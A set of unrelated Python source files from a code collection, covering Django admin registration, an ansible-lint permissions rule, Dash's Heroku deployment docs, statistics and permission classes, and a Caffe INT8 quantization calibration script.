if bot.config.lang == 'fr':
bot.say('Semble que ' + site + ' ne fonctionne pas ou n\'existe pas.')
elif bot.config.lang == 'es':
bot.say('Parece que ' + site + ' no funciona o no existe.')
else:
bot.say(site + ' looks down from here.')
return
|
py | 1a3446fcda97c5de57f98d70fa66945754cb8844 | from django.contrib import admin
# Register your models here.
from .models import Lifter
from .models import License
from .models import District
from .models import Club
admin.site.register(Lifter)
admin.site.register(License)
admin.site.register(District)
admin.site.register(Club) |
py | 1a344732f7d5a73ee4be2e69863515bad04f5b22 | # Copyright (c) 2020 Sorin Sbarnea <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ansiblelint.rules import AnsibleLintRule
class MissingFilePermissionsRule(AnsibleLintRule):
id = "208"
shortdesc = 'File permissions not mentioned'
description = (
"Missing mode parameter can cause unexpected file permissions based "
"on version of Ansible being used. Be explicit, or if you still "
"want the default behavior you can use ``mode: preserve`` to avoid "
"hitting this rule. See "
"https://github.com/ansible/ansible/issues/71200"
)
severity = 'VERY_HIGH'
tags = ['unpredictability']
version_added = 'v4.3.0'
_modules = (
'copy',
'file',
'ini_file',
'lineinfile',
'replace',
'template',
'unarchive',
)
def matchtask(self, file, task):
if task["action"]["__ansible_module__"] not in self._modules:
return False
if task['action'].get('state', None) == "absent":
return False
mode = task['action'].get('mode', None)
return mode is None
|
py | 1a3447ea133ce04c6977b72b8080f55ae3c4bc3e | import dash_core_components as dcc
import dash_html_components as html
from dash_docs import styles
from dash_docs import reusable_components as rc
layout = html.Div(children=[
rc.Markdown('''
# Deploying Dash Apps
By default, Dash apps run on `localhost` - you can only access them on your
own machine. To share a Dash app, you need to "deploy" it to a server.
Our recommend method for securely deploying Dash applications is
[Dash Enterprise](https://plotly.com/dash).
> Dash Enterprise can be installed on the Kubernetes
> services of
> [AWS](https://go.plotly.com/dash-aws),
> [Azure](https://go.plotly.com/dash-azure),
> GCP,
> or an
> [on-premise Linux Server](https://plotly.com/dash/on-premises-linux/?utm_source=docs&utm_medium=workspace&utm_campaign=nov&utm_content=linux).
> [Find out if your company is using Dash Enterprise](https://go.plotly.com/company-lookup)
## Dash Enterprise Deployment
> If your company has licensed Dash Enterprise, then view the deployment
> documentation by visiting
>
> **`https://<your-dash-enterprise-platform>/Docs/dash-enterprise`**
>
> (Replace `<your-dash-enterprise-platform>` with the hostname of your
> licensed Dash Enterprise in your VPC).
>
> [Look up the hostname for your company's license](https://go.plotly.com/company-lookup)
[Dash Enterprise](https://plotly.com/dash/)
is Plotly's commercial product for developing & deploying
Dash Apps on your company's on-premises Linux servers or VPC
([AWS](https://plotly.com/dash/aws), [Google Cloud](https://plotly.com/dash), or [Azure](https://plotly.com/dash/azure)).
In addition to [easy, git-based deployment](https://plotly.com/dash/app-manager), the Dash Enterprise platform provides a complete Analytical App Stack.
This includes:
- [LDAP & SAML Authentication Middleware](https://plotly.com/dash/authentication)
- [Data Science Workspaces](https://plotly.com/dash/workspaces)
- [High Availability & Horizontal Scaling](https://plotly.com/dash/kubernetes)
- [Job Queue Support](https://plotly.com/dash/job-queue)
- [Enterprise-Wide Dash App Portal](https://plotly.com/dash/app-manager)
- [Design Kit](https://plotly.com/dash/design-kit)
- [Reporting, Alerting, Saved Views, and PDF Reports](https://plotly.com/dash/snapshot-engine)
- [Dashboard Toolkit](https://plotly.com/dash/toolkit)
- [Embedding Dash apps in Existing websites or Salesforce](https://plotly.com/dash/embedding)
- [AI App Catalog](https://plotly.com/dash/ai-and-ml-templates)
- [Big Data Best Practices](https://plotly.com/dash/big-data-for-python)
- [GPU support](https://plotly.com/dash/gpu-dask-acceleration)

## Heroku for Sharing Public Dash apps for Free
Heroku is one of the easiest platforms for deploying and managing public Flask
applications. The git & buildpack-based deployment of UIs of Heroku and Dash Enterprise
are nearly identical, enabling an easy transition to Dash Enterprise if you
are already using Heroku.
[View the official Heroku guide to Python](https://devcenter.heroku.com/articles/getting-started-with-python#introduction).
Here is a simple example. This example requires a Heroku account,
`git`, and `virtualenv`.
***
**Step 1. Create a new folder for your project:**
'''),
rc.Markdown('''
```shell
$ mkdir dash_app_example
$ cd dash_app_example
```
''', style=styles.code_container),
rc.Markdown('''
***
**Step 2. Initialize the folder with `git` and a `virtualenv`**
'''),
rc.Markdown('''
```shell
$ git init # initializes an empty git repo
$ virtualenv venv # creates a virtualenv called "venv"
$ source venv/bin/activate # uses the virtualenv
```
''',style=styles.code_container),
rc.Markdown('''
`virtualenv` creates a fresh Python instance. You will need to reinstall your
app's dependencies with this virtualenv:
'''),
rc.Markdown('''
```shell
$ pip install dash
$ pip install plotly
```
''', style=styles.code_container),
rc.Markdown('''
You will also need a new dependency, `gunicorn`, for deploying the app:
'''),
rc.Markdown('''
```shell
$ pip install gunicorn
```
''', style=styles.code_container),
rc.Markdown('''***
**Step 3. Initialize the folder with a sample app (`app.py`), a `.gitignore` file, `requirements.txt`, and a `Procfile` for deployment**
Create the following files in your project folder:
**`app.py`**
'''),
rc.Markdown('''
```python
import os
import dash
import dash_core_components as dcc
import dash_html_components as html
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets)
server = app.server
app.layout = html.Div([
html.H2('Hello World'),
dcc.Dropdown(
id='dropdown',
options=[{'label': i, 'value': i} for i in ['LA', 'NYC', 'MTL']],
value='LA'
),
html.Div(id='display-value')
])
@app.callback(dash.dependencies.Output('display-value', 'children'),
[dash.dependencies.Input('dropdown', 'value')])
def display_value(value):
return 'You have selected "{}"'.format(value)
if __name__ == '__main__':
app.run_server(debug=True)
```
''', style=styles.code_container),
rc.Markdown('''
***
**`.gitignore`**
'''),
rc.Markdown('''
```shell
venv
*.pyc
.DS_Store
.env
```
''', style=styles.code_container),
rc.Markdown('''
***
**`Procfile`**
'''),
rc.Markdown('''
```shell
web: gunicorn app:server
```
''', style=styles.code_container),
rc.Markdown('''
(Note that `app` refers to the filename `app.py`.
`server` refers to the variable `server` inside that file).
***
**`requirements.txt`**
`requirements.txt` describes your Python dependencies.
You can fill this file in automatically with:
'''),
rc.Markdown('''
```shell
$ pip freeze > requirements.txt
```
''', style=styles.code_container),
rc.Markdown('''
***
**4. Initialize Heroku, add files to Git, and deploy**
'''),
rc.Markdown('''
```shell
$ heroku create my-dash-app # change my-dash-app to a unique name
$ git add . # add all files to git
$ git commit -m 'Initial app boilerplate'
$ git push heroku master # deploy code to heroku
$ heroku ps:scale web=1 # run the app with a 1 heroku "dyno"
```
''', style=styles.code_container),
rc.Markdown('''
You should be able to view your app at `https://my-dash-app.herokuapp.com`
(changing `my-dash-app` to the name of your app).
**5. Update the code and redeploy**
When you modify `app.py` with your own code, you will need to add the changes
to git and push those changes to heroku.
'''),
rc.Markdown('''
```shell
$ git status # view the changes
$ git add . # add all the changes
$ git commit -m 'a description of the changes'
$ git push heroku master
```
''', style=styles.code_container),
rc.Markdown('''
***
This workflow for deploying apps on Heroku is very similar to how deployment
works with the Plotly Enterprise's Dash Enterprise.
[Learn more](https://plotly.com/dash/) or [get in touch](https://plotly.com/get-demo/).
''')
])
|
py | 1a3448a72870f9a11cb01bfef38f28b2d7bfa974 | from .views import ContentViewSet
from django.conf.urls import url, include
from rest_framework import routers
router = routers.DefaultRouter()
router.register(r'contents', ContentViewSet)
urlpatterns = [
url(r'^', include(router.urls)),
]
|
py | 1a3448b1474cff1fcc2b864897c55133bfcd1220 | #!/usr/bin/env python
import logging
import warnings
import numpy as np
from numpy.lib.ufunclike import isposinf
from scipy.stats import chi
EPS = 1e-8
class MultiVariateNormalDistribution(object):
def __init__(self, shift, scale, cov, dim=None):
# main components
self.shift = shift
self.scale = scale
self.cov = cov
# params
self.dim = dim if dim is not None else shift.shape[0]
# states
self.eigvecs = None
self.eigvals = None
self.inv_cov = None
self.invsqrt_cov = None
self.rev = None
# decompose cov
self.decomposed = False
def decompose(self, force_positive=False, shrinkage=0, rescale=None, bound_size=float('inf')):
# force symmetric
self.cov = (self.cov + self.cov.T) / 2.0
# solve
self.eigvals, self.eigvecs = np.linalg.eigh(self.cov)
# force positive definite
if force_positive:
self.eigvals = np.clip(self.eigvals, EPS, None)
# shrinkage
if shrinkage > 0:
trace_cov = np.sum(self.eigvals)
self.eigvals = (1 - shrinkage) * self.eigvals + shrinkage * (trace_cov / self.dim) * np.ones(self.dim)
# rescale
if rescale is not None:
ratio = (self.scale / rescale) ** 2
self.cov *= ratio
self.eigvals *= ratio
self.scale = rescale
# restrict max length
base_length = chi.mean(self.dim) + 2.0 * chi.std(self.dim)
max_eigval = (bound_size / base_length) ** 2
self.eigvals = np.clip(self.eigvals, EPS, max_eigval)
# computing
with warnings.catch_warnings(record=True) as w:
self.cov = np.dot(self.eigvecs, np.diag(self.eigvals)).dot(self.eigvecs.T)
#inv cov
self.inv_cov = np.dot(self.eigvecs, np.diag(self.eigvals ** -1)).dot(self.eigvecs.T)
# inv sqrt cov
self.invsqrt_cov = np.dot(self.eigvecs, np.diag(self.eigvals ** -0.5)).dot(self.eigvecs.T)
# sqrt cov
self.sqrt_cov = np.dot(self.eigvecs, np.diag(self.eigvals ** 0.5)).dot(self.eigvecs.T)
# reverse projection matrix
self.rev = np.dot(np.diag(self.eigvals ** -0.5), self.eigvecs.T)
# handle warnings
if len(w) > 0:
print("Eigvals: ", self.eigvals)
print("Sigma: ", self.scale)
raise Exception("Negative eigval")
def sample(self, num, remap=None):
if not self.decomposed:
self.decompose()
bias = np.random.normal(size=[num, self.dim])
amp_bias = self.scale * (self.eigvals ** 0.5)[np.newaxis,:] * bias
rot_bias = np.dot(amp_bias, self.eigvecs.T)
samples = self.shift[np.newaxis,:] + rot_bias
if remap is not None:
samples = remap(samples)
return samples
def dispersion(self, X):
x = X.reshape(-1, self.dim)
y = x - self.shift[np.newaxis, :]
z = np.dot(y / self.scale, self.invsqrt_cov)
dens = np.sum(z ** 2, axis=1)
if len(X.shape) == 1:
dens = dens[0]
return dens
|
py | 1a344902adc50bbe172d020be4f9a2271913c41c | from .network import KubeModel
from .dataset import KubeDataset
|
py | 1a34494ba6550fd9099bba9bf7e02caef724717b | from glitchtip.permissions import ScopedPermission
class ProjectPermission(ScopedPermission):
scope_map = {
"GET": ["project:read", "project:write", "project:admin"],
"POST": ["project:write", "project:admin"],
"PUT": ["project:write", "project:admin"],
"DELETE": ["project:admin"],
}
def get_user_scopes(self, obj, user):
return obj.organization.get_user_scopes(user)
class ProjectKeyPermission(ProjectPermission):
def get_user_scopes(self, obj, user):
return obj.project.organization.get_user_scopes(user)
|
py | 1a344a985b0cf9324fda9ffd3f5f573f07100fed | # -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# DeepGlint is pleased to support the open source community by making EasyQuant available.
# Copyright (C) 2020 DeepGlint. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Modified from https://github.com/BUG1989/caffe-int8-convert-tools
# BUG1989 is pleased to support the open source community by supporting ncnn available.
#
# Copyright (C) 2019 BUG1989. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
"""
Quantization module for generating the calibration tables will be used by
quantized (INT8) models from FP32 models.with bucket split,[k, k, cin, cout]
cut into "cout" buckets.
This tool is based on Caffe Framework.
"""
from __future__ import division
from __future__ import print_function
import argparse
import numpy as np
import math, copy
import matplotlib.pyplot as plt
import sys,os
import caffe
import caffe.proto.caffe_pb2 as caffe_pb2
import time
import datetime
from google.protobuf import text_format
from scipy import stats
import cv2
# np.set_printoptions(threshold='nan')
np.set_printoptions(suppress=True)
def parse_args():
parser = argparse.ArgumentParser(
description='find the pretrained caffe models int8 quantize scale value')
parser.add_argument('--proto', dest='proto',
help="path to deploy prototxt.", type=str)
parser.add_argument('--model', dest='model',
help='path to pretrained weights', type=str)
parser.add_argument('--mean', dest='mean',
help='value of mean', type=float, nargs=3)
parser.add_argument('--norm', dest='norm',
help='value of normalize', type=float, nargs=1, default=1.0)
parser.add_argument('--images', dest='images',
help='path to calibration images', type=str)
parser.add_argument('--output', dest='output',
help='path to output calibration table file', type=str, default='calibration-dev.table')
parser.add_argument('--group', dest='group',
help='enable the group scale', type=int, default=1)
parser.add_argument('--gpu', dest='gpu',
help='use gpu to forward', type=int, default=0)
parser.add_argument('--threshold', dest='threshold',
help='the threshold of activations', type=float, default=float('inf'))
parser.add_argument('--histgram', dest='histgram',
help='whether to generate activation histograms', type=bool, default=False)
parser.add_argument('--cv2', dest='cv2',help='whether use opencv read image', type=bool, default=False)
args = parser.parse_args()
return args, parser
global args, parser
args, parser = parse_args()
# global params
QUANTIZE_NUM = 127# 7bit
QUANTIZE_WINOGRAND_NUM = 127 # 6bit
STATISTIC = 1
INTERVAL_NUM = 2001
# ugly global params
quantize_layer_lists = []
def image_processing(image, image_size, mean_value):
w = image.shape[1]
h = image.shape[0]
m = min(w, h)
ratio = 256.0 / m
new_w, new_h = int(ratio * w), int(ratio * h)
image = cv2.resize(image, (new_w, new_h))
image = image.astype(np.float32)
top = (new_w - image_size)//2
left = (new_h - image_size)//2
image = image[left:left+image_size, top:top+image_size]
image = image - mean_value
image = image.transpose(2, 0, 1)
return image # bgr, chw, normalized
class QuantizeLayer:
def __init__(self, name, blob_name, group_num):
self.name = name
self.blob_name = blob_name
self.group_num = group_num
self.weight_scale = np.zeros(group_num)
self.blob_max = 0.0
self.blob_distubution_interval = 0.0
self.blob_distubution = np.zeros(INTERVAL_NUM)
self.blob_distubution_edges= np.zeros(INTERVAL_NUM)
self.blob_threshold = 0
self.blob_scale = 1.0
self.group_zero = np.zeros(group_num)
self.pc= True
def quantize_weight(self, weight_data, flag):
# spilt the weight data by cout num
blob_group_data = np.array_split(weight_data, self.group_num)
#add by diwu
glob_group_max= np.max(weight_data)
glob_group_min= np.min(weight_data)
glob_group_threshold = max(abs(glob_group_max), abs(glob_group_min))
for i, group_data in enumerate(blob_group_data):
#per channel quant
if self.pc:
max_val = np.max(group_data)
min_val = np.min(group_data)
threshold = max(abs(max_val), abs(min_val))
if threshold < 0.0001:
self.weight_scale[i] = 0
self.group_zero[i] = 1
else:
if(flag == True):
self.weight_scale[i] = QUANTIZE_WINOGRAND_NUM / threshold
else:
self.weight_scale[i] = QUANTIZE_NUM / threshold
print("%-20s group : %-5d max_val : %-10f scale_val : %-10f" % (self.name + "_param0", i, threshold, self.weight_scale[i]))
else:
if glob_group_threshold < 0.0001:
self.weight_scale[i] = 0
self.group_zero[i] = 1
else:
if(flag == True):
self.weight_scale[i] = QUANTIZE_WINOGRAND_NUM / glob_group_threshold
else:
self.weight_scale[i] = QUANTIZE_NUM / glob_group_threshold
print("%-20s group : %-5d max_val : %-10f scale_val : %-10f" % (self.name + "_param0", i, glob_group_threshold, self.weight_scale[i]))
def initial_blob_max(self, blob_data):
# get the max value of blob
max_val = np.max(blob_data)
min_val = np.min(blob_data)
self.blob_max = max(self.blob_max, max(abs(max_val), abs(min_val)))
# Avoid unusually large activation by clip blob_max with threshold
self.th= min(self.blob_max, args.threshold)
def initial_blob_distubution_interval(self):
self.blob_distubution_interval = STATISTIC * self.th / INTERVAL_NUM
print("%-20s max_val : %-10.8f distribution_intervals : %-10.8f" % (self.name, self.blob_max, self.blob_distubution_interval))
def initial_histograms(self, blob_data):
# collect histogram of every group channel blob
th= self.th
# Truncate the boundary of the active hist graph,
# so the number exceeding the boundary value will not fall into statistics.
# add by diwu
hist, hist_edge = np.histogram(blob_data, bins=INTERVAL_NUM, range=(0, th))
self.blob_distubution_edges = hist_edge
self.blob_distubution += hist
def quantize_blob(self):
# calculate threshold
distribution = np.array(self.blob_distubution)
# pick threshold which minimizes KL divergence
threshold_bin = threshold_distribution(distribution)
self.blob_threshold = threshold_bin
threshold = (threshold_bin + 0.5) * self.blob_distubution_interval
# get the activation calibration value
self.blob_scale = QUANTIZE_NUM / threshold
#self.blob_scale = np.max(self.blob_scale,1) #add by diwu
print("%-20s bin : %-8d threshold : %-10f interval : %-10f scale : %-10f" % (self.name, threshold_bin, threshold, self.blob_distubution_interval, self.blob_scale))
def _smooth_distribution(p, eps=0.0001):
"""Given a discrete distribution (may have not been normalized to 1),
smooth it by replacing zeros with eps multiplied by a scaling factor and taking the
corresponding amount off the non-zero values.
Ref: http://web.engr.illinois.edu/~hanj/cs412/bk3/KL-divergence.pdf
"""
is_zeros = (p == 0).astype(np.float32)
is_nonzeros = (p != 0).astype(np.float32)
n_zeros = is_zeros.sum()
n_nonzeros = p.size - n_zeros
if not n_nonzeros:
raise ValueError('The discrete probability distribution is malformed. All entries are 0.')
eps1 = eps * float(n_zeros) / float(n_nonzeros)
assert eps1 < 1.0, 'n_zeros=%d, n_nonzeros=%d, eps1=%f' % (n_zeros, n_nonzeros, eps1)
hist = p.astype(np.float32)
hist += eps * is_zeros + (-eps1) * is_nonzeros
assert (hist <= 0).sum() == 0
return hist
def threshold_distribution(distribution, target_bin=128):
"""
Return the best threshold value.
Ref: https://github.com//apache/incubator-mxnet/blob/master/python/mxnet/contrib/quantization.py
Args:
distribution: list, activations has been processed by histogram and normalize,size is 2048
target_bin: int, the num of bin that is used by quantize, Int8 default value is 128
Returns:
target_threshold: int, num of bin with the minimum KL
"""
distribution = distribution[1:]
length = distribution.size
threshold_sum = sum(distribution[target_bin:])
kl_divergence = np.zeros(length - target_bin)
for threshold in range(target_bin, length):
sliced_nd_hist = copy.deepcopy(distribution[:threshold])
# generate reference distribution p
p = sliced_nd_hist.copy()
p[threshold-1] += threshold_sum
threshold_sum = threshold_sum - distribution[threshold]
# is_nonzeros[k] indicates whether hist[k] is nonzero
is_nonzeros = (p != 0).astype(np.int64)
#
quantized_bins = np.zeros(target_bin, dtype=np.int64)
# calculate how many bins should be merged to generate quantized distribution q
num_merged_bins = sliced_nd_hist.size // target_bin
# merge hist into num_quantized_bins bins
for j in range(target_bin):
start = j * num_merged_bins
stop = start + num_merged_bins
quantized_bins[j] = sliced_nd_hist[start:stop].sum()
quantized_bins[-1] += sliced_nd_hist[target_bin * num_merged_bins:].sum()
# expand quantized_bins into p.size bins
q = np.zeros(sliced_nd_hist.size, dtype=np.float64)
for j in range(target_bin):
start = j * num_merged_bins
if j == target_bin - 1:
stop = -1
else:
stop = start + num_merged_bins
norm = is_nonzeros[start:stop].sum()
if norm != 0:
q[start:stop] = float(quantized_bins[j]) / float(norm)
q[p == 0] = 0
p = _smooth_distribution(p) # with some bugs, need to fix
q = _smooth_distribution(q)
p[p == 0] = 0.0001
q[q == 0] = 0.0001
# calculate kl_divergence between q and p
kl_divergence[threshold - target_bin] = stats.entropy(p, q)
min_kl_divergence = np.argmin(kl_divergence)
threshold_value = min_kl_divergence + target_bin
return threshold_value
def net_forward(net, image_path, transformer=None, image_size=224, mean_value=[103.939, 116.779, 123.68]):
"""
network inference and statistics the cost time
Args:
net: the instance of Caffe inference
image_path: a image need to be inference
transformer: caffe io transformar
image_size: image shape of blob data
mean_value: mean value for normalization
Returns:
none
"""
if args.cv2:
# load image
image = cv2.imread(image_path)
image = image_processing(image, image_size, mean_value)
net.blobs['data'].reshape(1, 3, image_size, image_size)
net.blobs['data'].data[...] = np.array([image], dtype=np.float32)
else:
# load image
im = caffe.io.load_image(image_path)
nh, nw = 224, 224
h, w, _ = im.shape
if h < w:
off = int((w - h) / 2)
im = im[:, off:off + h]
else:
off = int((h - w) / 2)
im = im[off:off + h, :]
im = caffe.io.resize_image(im, [nh, nw])
# transformer.preprocess the image
net.blobs['data'].data[...] = transformer.preprocess('data', im)
# net forward
output = net.forward()
def file_name(file_dir):
"""
Find the all file path with the directory
Args:
file_dir: The source file directory
Returns:
files_path: all the file path into a list
"""
files_path = []
for root, dir, files in os.walk(file_dir):
for name in files:
file_path = root + "/" + name
print(file_path)
files_path.append(file_path)
return files_path
def network_prepare(net, mean, norm):
"""
instance the prepare process param of caffe network inference
Args:
net: the instance of Caffe inference
mean: the value of mean
norm: the value of normalize
Returns:
none
"""
print("Network initial")
img_mean = np.array(mean, dtype=np.float32)
# initial transformer
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
# convert hwc to cwh
transformer.set_transpose('data', (2,0,1))
# convert RGB -> BGR
transformer.set_channel_swap('data', (2,1,0))
# resize image data from [0,1] to [0,255]
transformer.set_raw_scale('data', 255)
# load meanfile
transformer.set_mean('data', img_mean)
# normalize
transformer.set_input_scale('data', norm)
return transformer
def weight_quantize(net, net_file, group_on, winograd=False):
"""
CaffeModel convolution weight blob Int8 quantize
Args:
net: the instance of Caffe inference
net_file: deploy caffe prototxt
Returns:
none
"""
print("\nQuantize the kernel weight:")
# parse the net param from deploy prototxt
params = caffe_pb2.NetParameter()
with open(net_file) as f:
text_format.Merge(f.read(), params)
for i, layer in enumerate(params.layer):
# find the convolution layers to get out the weight_scale
if(layer.type == "Convolution" or layer.type == "ConvolutionDepthwise"):
weight_blob = net.params[layer.name][0].data
# initial the instance of QuantizeLayer Class lists,you can use enable group quantize to generate int8 scale for each group layer.convolution_param.group
if (group_on == 1):
quanitze_layer = QuantizeLayer(layer.name, layer.bottom[0], layer.convolution_param.num_output)
else:
quanitze_layer = QuantizeLayer(layer.name, layer.bottom[0], 1)
if not winograd:
# quantize the weight value using QUANTIZE_WINOGRAND_NUM for all layers
quanitze_layer.quantize_weight(weight_blob, True)
else:
# quantize the weight value using 6bit for conv3x3s1 layer to winograd F(4,3)
if(layer.type == "Convolution" and layer.convolution_param.kernel_size[0] == 3 and ((len(layer.convolution_param.stride) == 0) or layer.convolution_param.stride[0] == 1)):
if(layer.convolution_param.group != layer.convolution_param.num_output):
quanitze_layer.quantize_weight(weight_blob, True)
else:
quanitze_layer.quantize_weight(weight_blob, False)
# quantize the weight value using 8bit for another conv layers
else:
quanitze_layer.quantize_weight(weight_blob, False)
# add the quantize_layer into the save list
quantize_layer_lists.append(quanitze_layer)
return None
def activation_quantize(net, transformer, images_files):
"""
Activation Int8 quantize, optimaize threshold selection with KL divergence,
given a dataset, find the optimal threshold for quantizing it.
Ref: http://on-demand.gputechconf.com/gtc/2017/presentation/s7310-8-bit-inference-with-tensorrt.pdf
Args:
net: the instance of Caffe inference
transformer:
images_files: calibration dataset
Returns:
none
"""
print("\nQuantize the Activation:")
# run float32 inference on calibration dataset to find the activations range
for i , image in enumerate(images_files):
# inference
net_forward(net, image, transformer)
# find max threshold
for layer in quantize_layer_lists:
blob = net.blobs[layer.blob_name].data[0].flatten()
layer.initial_blob_max(blob)
if i % 100 == 0:
print("loop stage 1 : %d/%d" % (i, len(images_files)))
# calculate statistic blob scope and interval distribution
for layer in quantize_layer_lists:
layer.initial_blob_distubution_interval()
# for each layers
# collect histograms of activations
print("\nCollect histograms of activations:")
for i, image in enumerate(images_files):
net_forward(net, image, transformer)
for layer in quantize_layer_lists:
blob = net.blobs[layer.blob_name].data[0].flatten()
blob= blob[blob > 0]
layer.initial_histograms(blob)
if i % 100 == 0:
print("loop stage 2 : %d/%d" % (i, len(images_files)))
# calculate threshold with KL divergence
if args.histgram:
from collections import OrderedDict
quant_hist= OrderedDict()
for layer in quantize_layer_lists:
layer.quantize_blob()
if args.histgram:
quant_hist[layer.name]= (layer.blob_max,layer.blob_distubution,layer.blob_distubution_edges,QUANTIZE_NUM/layer.blob_scale)
if args.histgram:
import pickle
with open('histgram.pkl','wb') as f:
pickle.dump(quant_hist,f)
print('save histograms success! use plot script to generate graphs')
return None
def save_calibration_file(calibration_path):
calibration_file = open(calibration_path, 'w')
# save temp
save_temp = []
# save weight scale
for layer in quantize_layer_lists:
save_string = layer.name + "_param_0"
for i in range(layer.group_num):
save_string = save_string + " " + str(layer.weight_scale[i])
save_temp.append(save_string)
# save bottom blob scales
for layer in quantize_layer_lists:
save_string = layer.name + " " + str(layer.blob_scale)
save_temp.append(save_string)
# save into txt file
for data in save_temp:
calibration_file.write(data + "\n")
calibration_file.close()
# save calibration logs
save_temp_log = []
calibration_file_log = open(calibration_path + ".log", 'w')
for layer in quantize_layer_lists:
save_string = layer.name + ": value range 0 - " + str(layer.blob_max) \
+ ", interval " + str(layer.blob_distubution_interval) \
+ ", interval num " + str(INTERVAL_NUM) \
+ ", threshold num " + str(layer.blob_threshold) + "\n" \
+ str(layer.blob_distubution.astype(dtype=np.int64))
save_temp_log.append(save_string)
# save into txt file
for data in save_temp_log:
calibration_file_log.write(data + "\n")
def usage_info():
"""
usage info
"""
print("Input params is illegal...╮(╯3╰)╭")
print("try it again:\n python caffe-int8-scale-tools-dev.py -h")
def main():
"""
main function
"""
# time start
time_start = datetime.datetime.now()
print(args)
if args.proto == None or args.model == None or args.mean == None or args.images == None:
usage_info()
return None
# deploy caffe prototxt path
net_file = args.proto
# trained caffemodel path
caffe_model = args.model
# mean value
mean = args.mean
# norm value
norm = 1.0
if args.norm != 1.0:
norm = args.norm[0]
# calibration dataset
images_path = args.images
# the output calibration file
calibration_path = args.output
# enable the group scale
group_on = args.group
# default use CPU to forwark
if args.gpu != 0:
caffe.set_mode_gpu()
caffe.set_device(0)
# initial caffe net and the forword model(GPU or CPU)
net = caffe.Net(net_file,caffe_model,caffe.TEST)
# prepare the cnn network
transformer = network_prepare(net, mean, norm)
# get the calibration datasets images files path
images_files = file_name(images_path)
# quanitze kernel weight of the caffemodel to find it's calibration table
weight_quantize(net, net_file, group_on)
# quantize activation value of the caffemodel to find it's calibration table
activation_quantize(net, transformer, images_files)
# save the calibration tables,best wish for your INT8 inference have low accuracy loss :)
save_calibration_file(calibration_path)
# time end
time_end = datetime.datetime.now()
print("\nCaffe Int8 Calibration table create success, it's cost %s, best wish for your INT8 inference has a low accuracy loss...\(^▽^)/...2333..." % (time_end - time_start))
if __name__ == "__main__":
main()
|
py | 1a344acbac7da3cb20ec59ab674fbe1c78a1dcc4 | #!/usr/bin/python
import fileinput
import string
import sys
import os
# BGP
#fortran_compiler = '/bgsys/drivers/ppcfloor/comm/bin/mpixlf77_r'
fortran_compiler = '/opt/ibmcmp/xlf/bg/11.1/bin/bgxlf_r'
fortran_opt_flags = '-O5 -qnoipa -qarch=450d -qtune=450 -qprefetch -qunroll=yes -qmaxmem=-1 -qextname -qalias=noaryovrlp:nopteovrlp -qreport=hotlist -c'
fortran_linker = '/bgsys/drivers/ppcfloor/comm/bin/mpixlf77_r'
fortran_link_flags = '-O3 -qnoipa -qarch=450d -qtune=450 -qunroll=no -qmaxmem=-1 -qextname'
#c_compiler = '/bgsys/drivers/ppcfloor/comm/bin/mpixlc_r'
c_compiler = '/opt/ibmcmp/vacpp/bg/9.0/bin/bgxlc_r'
c_opt_flags = '-O5 -qarch=450d -qtune=450 -qprefetch -qunroll=yes -qmaxmem=-1 -c'
hpm_lib = '-L/soft/apps/UPC/lib -lhpm'
src_dir = '/gpfs/home/jhammond/spaghetty/python/archive/src/'
lst_dir = '/gpfs/home/jhammond/spaghetty/python/archive/lst/'
exe_dir = '/gpfs/home/jhammond/spaghetty/python/archive/exe/'
lib_name = 'tce_sort_f77.a'
count = '100'
rank = '40'
ranks = [rank,rank,rank,rank]
size = int(ranks[0])*int(ranks[1])*int(ranks[2])*int(ranks[3])
